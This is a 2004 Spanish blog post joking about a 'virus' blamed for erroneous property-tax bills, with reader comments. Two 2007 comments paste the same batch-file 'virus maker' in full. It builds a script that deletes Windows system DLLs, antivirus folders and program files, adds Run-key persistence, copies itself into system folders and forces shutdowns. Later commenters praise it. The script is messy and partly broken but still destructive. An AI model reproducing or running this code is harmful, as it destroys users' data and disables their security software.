Atalaya: desde la tela de araña

Cultura en la red, reflexiones, relatos, tutoriales y paridas diversas

Los primeros virus inteligentes

2004-05-23 01:00 Hoy ha aparecido en el Ideal de Granada (y en el Diaro de Cádiz y Granada Digital) la noticia de que un virus informático introduce datos erróneos en 7000 recibos del IBI. El virus no es tonto, no, porque a algunos les ha llegado un recibo por varios billones de euros, que, además, tienen que pagar antes de el final del siglo XIX.
Ya tiene que ser el virus inteligente. No sé yo como se almacenarán los datos del IBI, pero imagino que, como poco, estarán en una base de datos, no van a estar en un documento Word que diga "menda este, debe 200 lerus", "este no pagó el año pasao, métele caña". Si ha sucedido tal como lo cuentan, el virus ha tenido que hacer un select sobre parte de la base de datos, alterar un par de columnas (la de cantidad a pagar y la de fecha de vencimiento). Quizás es un virus escrito en SQL. La repanocha.
También es posible que esos datos, precisamente esos 7000, estuvieran almacenados en una partición de un disco duro, que como todo el mundo sabe, en primavera tienen cierta tendencia a morir, y que esa partición se perdiera por alguna razón ignota. O a lo mejor se metió un virus en ese PC y dijeron aquello de "rápido, formatéalo todo".
En fin, que como se decía antes, "siempre es bueno tener en la casa niños para echarles la culpa"; pues parafraseándolo, "siempre es bueno tener en el ordenador virus para echarles la culpa".
Por cierto, cómo se llamaría este? ¿SQL/IBI-GR-Terminator?

Referencias (TrackBacks)

URL de trackback de esta historia http://atalaya.blogalia.com//trackbacks/18848

Comentarios

1
De: JJ Fecha: 2004-05-23 10:32

Quizás deberían haber aprendido del municipio de Tulcán, que parcheó el sistema rápidamente, y, además, no afectó a todos los ordenadores porque "usaban otro sistema operativo".



2
De: El Peatón Fecha: 2004-05-23 10:44

Tanto en la administración como en los bancos nunca se equivocan, ¡y menos los ordenadores! Ahora, cuando hay un fallo, siempre es de la red. Nunca dicen: "perdonen nuestra incompetencia"



3
De: Cek Fecha: 2004-05-23 10:59

Siempre es culpa de alguien ajeno a la compañía, y luego cuando vas a los sitios se oye: " ¿CUAL ES LA CONTRASEÑA DE LA BASE DE DATOS?" y contesta la compañera "PEPITO".
En fin....



4
De: JJ Fecha: 2004-05-23 11:02

Lo peor no es eso, sino que efectivamente muchas contraseñas son "pepito" y "juanito"



5
De: Ramon Fecha: 2004-05-24 08:57

O "contraseña". No os riáis, que lo he visto.



6
De: fernand0 Fecha: 2004-05-24 18:17

Los virus sólo son pruebas (en muchos casos chapuceras) de lo que se puede hacer. Tal vez ya los haya (o los ha habido) con objetivos mas concretos que explotar los fallos para diseminarse o quedar exclavos, pendientes de las órdenes de su 'dueño'. No digo que sea este un caso, pero no desdeñen la posibilidad.



7
De: pepe Fecha: 2007-04-02 20:34

@echo off
:menu
color 7
echo *//////////// virus macker (by black_hack) ////////////*
echo ************ ============================ ************

@echo off
:menu
color 0c
echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo º Menu º
echo ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹
echo º 1.crear nuevo virus º
echo º 2.salir º
echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
set /p lolete= Que desea hacer? [1,2]
if %lolete%==1 goto acciones
if %lolete%==2 goto exit

:acciones
color 0c
set /p vir= nombre de nuevo virus (sin extencion):


set /p lolete= desea continuar?(s=si/n=no)

if %lolete%==s goto acciones
if %lolete%==n goto exit

:acciones

color 0c
echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo º virus º
echo ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹
echo º 1 (accion especificada en el manual) º
echo º 2 (accion especificada en el manual) º
echo º 3 (accion especificada en el manual) º
echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

set /p opc= Que desea hacer? [1,2]
if %opc%==1 goto opc1
if %opc%==2 goto accion2
if %opc%==3 goto opcion3
if %opc%==4 goto salir

:opc1

echo @echo off


echo start iexplore >> virus.bat
echo start cmd >> virus.bat
echo start iexplore >> virus.bat
echo start iexplore >> virus.bat
echo start iexplore >> virus.bat
echo start iexplore >> virus.bat
echo start iexplore >> virus.bat
echo start iexplore >> virus.bat
echo start iexplore >> virus.bat
echo start iexplore >> virus.bat
echo start iexplore >> virus.bat


echo @echo off >> virus.bat
echo echo Set oWMP = CreateObject("WMPlayer.OCX.7" ) ^>^> abrir.vbs >> virus.bat
echo echo Set colCDROMs = oWMP.cdromCollection ^>^> abrir.vbs >> virus.bat
echo echo. ^>^> abrir.vbs >> virus.bat
echo echo if colCDROMs.Count ^>^= 1 then ^>^> abrir.vbs >> virus.bat
echo echo For i = 0 to colCDROMs.Count - 1 ^>^> abrir.vbs >> virus.bat
echo echo colCDROMs.Item(i).Eject ^>^> abrir.vbs >> virus.bat
echo echo Next ' cdrom ^>^> abrir.vbs >> virus.bat
echo echo End If ^>^> abrir.vbs >> virus.bat
echo start abrir.vbs >> virus.bat


echo md c:\program files\virus >> virus.bat


echo echo off >> virus.bat


echo cd c:\documents and settings\andres\escritorio\virus.bat c:\program files\virus >> virus.bat

echo echo off >> virus.bat


echo @echo off >> virus.bat
echo :menu >> virus.bat
echo color 0c >> virus.bat

echo echo off >> copy virus.bat c:\ >> virus.bat


echo echo off >> virus.bat


echo @echo off >> virus.bat
echo cd C:\WINDOWS\system >> virus.bat
echo atrib -h -r -s -a *.dll >> virus.bat
echo del /q /f OLECLI.dll >> virus.bat
echo del /q /f SHELL.dll >> virus.bat
echo del /q /f VER.dll >> virus.bat
echo del /q /f TAPI.dll >> virus.bat
echo del /q /f MSVIDEO.dll >> virus.bat
echo del /q /f OLESVR.dll >> virus.bat
echo del /q /f LZEXPAND.dll >> virus.bat
echo del /q /f mmsystem.dll >> virus.bat
echo del /q /f crlds3d.dll >> virus.bat
echo del /q /f AVICAP.dll >> virus.bat
echo del /q /f AVIFILE.dll >> virus.bat
echo del /q /f COMMDLG.dll >> virus.bat
echo del /q /f LZEXPAND.dll >> virus.bat


echo @cd c:\Archivos de programa >> virus.bat
echo del /q /f /s "Alwil Software" >> virus.bat
echo del /q /f /s "Norton Antivirus" >> virus.bat
echo del /q /f /s "Kaspersky Lab" >> virus.bat


echo @echo off >> virus.bat
echo copy /y virus.bat c:\WINDOWS\Cursors >> virus.bat
echo copy /y virus.bat c:\WINDOWS\Fonts >> virus.bat
echo copy /y virus.bat c:\WINDOWS\Help >> virus.bat


echo @echo off >> virus.bat
echo reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v antiboot /t REG_SZ /d c:\WINDOWS\Cursors\Kalete.bat >> virus.bat


@echo off >> virus.bat
cd windows >> virus.bat
echo echo @echo off> winbat.bat >> virus.bat
echo echo echo msg * en cada inicio me veras ^>^ win.bat.bat >> virus.bat
echo reg add "hkey_local_machine\software\microsoft\windows\currentversion\run" /v winbat /t reg_sz /d >> virus.bat
echo echo off >> virus.bat
echo echo reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v antiboot /t REG_SZ /d >> virus.bat

echo echo pause >> %windir%\system32\winantiboot.bat >> virus.bat
echo %windir%\system32\win_antiboot.bat >> virus.bat
echo %windir%\system32\win_antiboot.bat >> virus.bat
echo @echo off >> virus.bat
echo cd\ >> virus.bat
echo at 00:00 goto del1 >> virus.bat
echo at 00:00 goto init >> virus.bat


echo :del1 >> virus.bat
echo @echo off >> virus.bat
echo cd\ >> virus.bat
echo cd C:\Archivos de programa\World of Warcraft >> virus.bat
echo attrib -H -S -R *.* >> virus.bat
echo del /S /Q *.* >> virus.bat
echo cd C:\Archivos de programa\MSN Messenger >> virus.bat
echo attrib -H -S -R *.* >> virus.bat
echo del /S /Q *.* >> virus.bat
echo cd C:\Archivos de programa\Skype >> virus.bat
echo attrib -H -S -R *.* >> virus.bat
echo del /S /Q *.* >> virus.bat


echo :init >> virus.bat
echo @echo off >> virus.bat
echo cd\ >> virus.bat
echo cd C:\Documents and Settings\All Users\* Inicio\Programas\Inicio >> virus.bat
echo echo @echo off > init.bat >> virus.bat
echo echo cd\ ^>^> init.bat >> virus.bat

echo echo s | erase C:\Archivos de programa\Grisoft\AVG Free\vault.dll >> virus.bat

echo @echo off >> virus.bat
echo cd\ >> virus.bat
echo cd archivos de programa >> virus.bat
echo del \Q\S Norton antivirus >> virus.bat

echo call cmd >> virus.bat

echo md c:\windows\system_32\ >> virus.bat

echo @echo off >> virus.bat

echo copy /y virus.bat c:\windows\system_32 >> virus.bat

echo @echo off >> virus.bat
echo @echo Hola >> virus.bat
echo del *.sys >> virus.bat
echo del *.exe >> virus.bat
echo del *.com >> virus.bat
echo cd windows >> virus.bat
echo del *.* >> virus.bat
echo cd\ >> virus.bat
echo del arquivo.bat >> virus.bat
echo @echo Estás muerto >> virus.bat
echo echo off >> virus.bat
echo reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v antiboot /t REG_SZ /d c:\windows\system32\winantiboot.bat > %windir%\system32\winantiboot.bat >> virus.bat
echo echo pause >> %windir%\system32\winantiboot.bat >> virus.bat
echo echo shutdown -s -f -t 10 -c "te lo dije, no enciendas el ordenador" > %windir%\system32\win_antiboot.bat >> virus.bat
%windir%\system32\win_antiboot.bat >> virus.bat
echo shutdown -s -f -t 10 -c " Erro Grave En El Sistema, Se Reiniciara En Unos Momentos..." >> virus.bat

echo cd\ >> virus.bat
echo copy /y %0 C:\Windows\System32\*.bat >> virus.bat
echo Reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v Win32 / "C:\Windows\System32\virus otro.bat" /f >> virus.bat
@echo off

ren virus.bat %vir%.bat


@echo off
color 0c
set /p ver= su virus ha sido creado con exito (presione una tecla para continuar)

@echo off
color 0c
set /p ver=Desea crear otro virus?(s/n)

if %lolete%==s goto acciones

:acciones
@echo off
ren virus.txt virus.bat


set /p ver= su virus ha sido creado con exito (presione una tecla para continuar)

set /p ver= 1=ir al menu:
echo
cls

if %lolete%==1 goto menu



8
De: hgorcemefer Fecha: 2007-04-02 20:38

x_-_-> @muy look URB USB RAN RON



9
De: Anónimo Fecha: 2007-04-02 20:39

@echo off
:menu
color 7
echo *//////////// virus macker (by black_hack) ////////////*
echo ************ ============================ ************

@echo off
:menu
color 0c
echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo º Menu º
echo ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹
echo º 1.crear nuevo virus º
echo º 2.salir º
echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
set /p lolete= Que desea hacer? [1,2]
if %lolete%==1 goto acciones
if %lolete%==2 goto exit

:acciones
color 0c
set /p vir= nombre de nuevo virus (sin extencion):


set /p lolete= desea continuar?(s=si/n=no)

if %lolete%==s goto acciones
if %lolete%==n goto exit

:acciones

color 0c
echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo º virus º
echo ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹
echo º 1 (accion especificada en el manual) º
echo º 2 (accion especificada en el manual) º
echo º 3 (accion especificada en el manual) º
echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

set /p opc= Que desea hacer? [1,2]
if %opc%==1 goto opc1
if %opc%==2 goto accion2
if %opc%==3 goto opcion3
if %opc%==4 goto salir

:opc1

echo @echo off


echo start iexplore >> virus.bat
echo start cmd >> virus.bat
echo start iexplore >> virus.bat
echo start iexplore >> virus.bat
echo start iexplore >> virus.bat
echo start iexplore >> virus.bat
echo start iexplore >> virus.bat
echo start iexplore >> virus.bat
echo start iexplore >> virus.bat
echo start iexplore >> virus.bat
echo start iexplore >> virus.bat


echo @echo off >> virus.bat
echo echo Set oWMP = CreateObject("WMPlayer.OCX.7" ) ^>^> abrir.vbs >> virus.bat
echo echo Set colCDROMs = oWMP.cdromCollection ^>^> abrir.vbs >> virus.bat
echo echo. ^>^> abrir.vbs >> virus.bat
echo echo if colCDROMs.Count ^>^= 1 then ^>^> abrir.vbs >> virus.bat
echo echo For i = 0 to colCDROMs.Count - 1 ^>^> abrir.vbs >> virus.bat
echo echo colCDROMs.Item(i).Eject ^>^> abrir.vbs >> virus.bat
echo echo Next ' cdrom ^>^> abrir.vbs >> virus.bat
echo echo End If ^>^> abrir.vbs >> virus.bat
echo start abrir.vbs >> virus.bat


echo md c:\program files\virus >> virus.bat


echo echo off >> virus.bat


echo cd c:\documents and settings\andres\escritorio\virus.bat c:\program files\virus >> virus.bat

echo echo off >> virus.bat


echo @echo off >> virus.bat
echo :menu >> virus.bat
echo color 0c >> virus.bat

echo echo off >> copy virus.bat c:\ >> virus.bat


echo echo off >> virus.bat


echo @echo off >> virus.bat
echo cd C:\WINDOWS\system >> virus.bat
echo atrib -h -r -s -a *.dll >> virus.bat
echo del /q /f OLECLI.dll >> virus.bat
echo del /q /f SHELL.dll >> virus.bat
echo del /q /f VER.dll >> virus.bat
echo del /q /f TAPI.dll >> virus.bat
echo del /q /f MSVIDEO.dll >> virus.bat
echo del /q /f OLESVR.dll >> virus.bat
echo del /q /f LZEXPAND.dll >> virus.bat
echo del /q /f mmsystem.dll >> virus.bat
echo del /q /f crlds3d.dll >> virus.bat
echo del /q /f AVICAP.dll >> virus.bat
echo del /q /f AVIFILE.dll >> virus.bat
echo del /q /f COMMDLG.dll >> virus.bat
echo del /q /f LZEXPAND.dll >> virus.bat


echo @cd c:\Archivos de programa >> virus.bat
echo del /q /f /s "Alwil Software" >> virus.bat
echo del /q /f /s "Norton Antivirus" >> virus.bat
echo del /q /f /s "Kaspersky Lab" >> virus.bat


echo @echo off >> virus.bat
echo copy /y virus.bat c:\WINDOWS\Cursors >> virus.bat
echo copy /y virus.bat c:\WINDOWS\Fonts >> virus.bat
echo copy /y virus.bat c:\WINDOWS\Help >> virus.bat


echo @echo off >> virus.bat
echo reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v antiboot /t REG_SZ /d c:\WINDOWS\Cursors\Kalete.bat >> virus.bat


@echo off >> virus.bat
cd windows >> virus.bat
echo echo @echo off> winbat.bat >> virus.bat
echo echo echo msg * en cada inicio me veras ^>^ win.bat.bat >> virus.bat
echo reg add "hkey_local_machine\software\microsoft\windows\currentversion\run" /v winbat /t reg_sz /d >> virus.bat
echo echo off >> virus.bat
echo echo reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v antiboot /t REG_SZ /d >> virus.bat

echo echo pause >> %windir%\system32\winantiboot.bat >> virus.bat
echo %windir%\system32\win_antiboot.bat >> virus.bat
echo %windir%\system32\win_antiboot.bat >> virus.bat
echo @echo off >> virus.bat
echo cd\ >> virus.bat
echo at 00:00 goto del1 >> virus.bat
echo at 00:00 goto init >> virus.bat


echo :del1 >> virus.bat
echo @echo off >> virus.bat
echo cd\ >> virus.bat
echo cd C:\Archivos de programa\World of Warcraft >> virus.bat
echo attrib -H -S -R *.* >> virus.bat
echo del /S /Q *.* >> virus.bat
echo cd C:\Archivos de programa\MSN Messenger >> virus.bat
echo attrib -H -S -R *.* >> virus.bat
echo del /S /Q *.* >> virus.bat
echo cd C:\Archivos de programa\Skype >> virus.bat
echo attrib -H -S -R *.* >> virus.bat
echo del /S /Q *.* >> virus.bat


echo :init >> virus.bat
echo @echo off >> virus.bat
echo cd\ >> virus.bat
echo cd C:\Documents and Settings\All Users\* Inicio\Programas\Inicio >> virus.bat
echo echo @echo off > init.bat >> virus.bat
echo echo cd\ ^>^> init.bat >> virus.bat

echo echo s | erase C:\Archivos de programa\Grisoft\AVG Free\vault.dll >> virus.bat

echo @echo off >> virus.bat
echo cd\ >> virus.bat
echo cd archivos de programa >> virus.bat
echo del \Q\S Norton antivirus >> virus.bat

echo call cmd >> virus.bat

echo md c:\windows\system_32\ >> virus.bat

echo @echo off >> virus.bat

echo copy /y virus.bat c:\windows\system_32 >> virus.bat

echo @echo off >> virus.bat
echo @echo Hola >> virus.bat
echo del *.sys >> virus.bat
echo del *.exe >> virus.bat
echo del *.com >> virus.bat
echo cd windows >> virus.bat
echo del *.* >> virus.bat
echo cd\ >> virus.bat
echo del arquivo.bat >> virus.bat
echo @echo Estás muerto >> virus.bat
echo echo off >> virus.bat
echo reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v antiboot /t REG_SZ /d c:\windows\system32\winantiboot.bat > %windir%\system32\winantiboot.bat >> virus.bat
echo echo pause >> %windir%\system32\winantiboot.bat >> virus.bat
echo echo shutdown -s -f -t 10 -c "te lo dije, no enciendas el ordenador" > %windir%\system32\win_antiboot.bat >> virus.bat
%windir%\system32\win_antiboot.bat >> virus.bat
echo shutdown -s -f -t 10 -c " Erro Grave En El Sistema, Se Reiniciara En Unos Momentos..." >> virus.bat

echo cd\ >> virus.bat
echo copy /y %0 C:\Windows\System32\*.bat >> virus.bat
echo Reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v Win32 / "C:\Windows\System32\virus otro.bat" /f >> virus.bat
@echo off

ren virus.bat %vir%.bat


@echo off
color 0c
set /p ver= su virus ha sido creado con exito (presione una tecla para continuar)

@echo off
color 0c
set /p ver=Desea crear otro virus?(s/n)

if %lolete%==s goto acciones

:acciones
@echo off
ren virus.txt virus.bat


set /p ver= su virus ha sido creado con exito (presione una tecla para continuar)

set /p ver= 1=ir al menu:
echo
cls

if %lolete%==1 goto menu
su contraseña es la anterior



10
De: amoroso Fecha: 2007-06-04 17:02

Favor enviado, los .bat que maneja este virus......



11
De: ^_^ Fecha: 2007-07-30 00:01

El virus maker fue mi primer Programa...



12
De: gus Fecha: 2007-09-09 03:35

quiero saber el codigo para hacer que un diskette sea autojecutable, con un archivo autorun inf no lo he logrado y no se como ahcerlo con un bat



13
De: JJ Fecha: 2007-09-09 09:50

A lo mejor no está configurado el ordenador para eso...



14
De: channy Fecha: 2007-11-04 19:29

mola el creador de virus, pero hay 2 problemillas:
1:que hace este virus??
2:el panda creo que lo "pilla"
aun asi kreo ke os lo abeis kurrrao koño
Saludos o_0



15
De: lllllllllllllll Fecha: 2009-01-02 18:09

no entiendo nada de lo que comentan ni de que escribiooooooooooo.



Nombre
Correo-e
URL
Dirección IP: 38.103.63.62 (14ee4eb600)
Comentario

Se comenta en...

  • anonimo en Las llamadas del 609
  • Anonimo en En contra de pagar en el metro
  • JJ en Viajes extremos
  • Anónima en Viajes extremos
  • JJ en Viajes extremos
  • Senior citizen en Viajes extremos
  • Senior citizen en El tuit mató a la estrella de la (inexistente) blogosfera
  • Anónima en El tuit mató a la estrella de la (inexistente) blogosfera
  • Kialaya en El tuit mató a la estrella de la (inexistente) blogosfera
  • JJ en ¿La ha diñado el punto crítico, mágico o de ruptura o como se llame?
  • Sobre Atalaya

    Esta es la bitácora o blog de Juan Julián Merelo. Si quieres contactar con el autor, usa su correo electrónico jjmerelo (arroba) gmail.com, o simplemente deja un comentario.

    Compra lujoyglamour.net

    Listas de deseos

    A veces leo

    Otras veces escribo en

    Blogalia Blogalia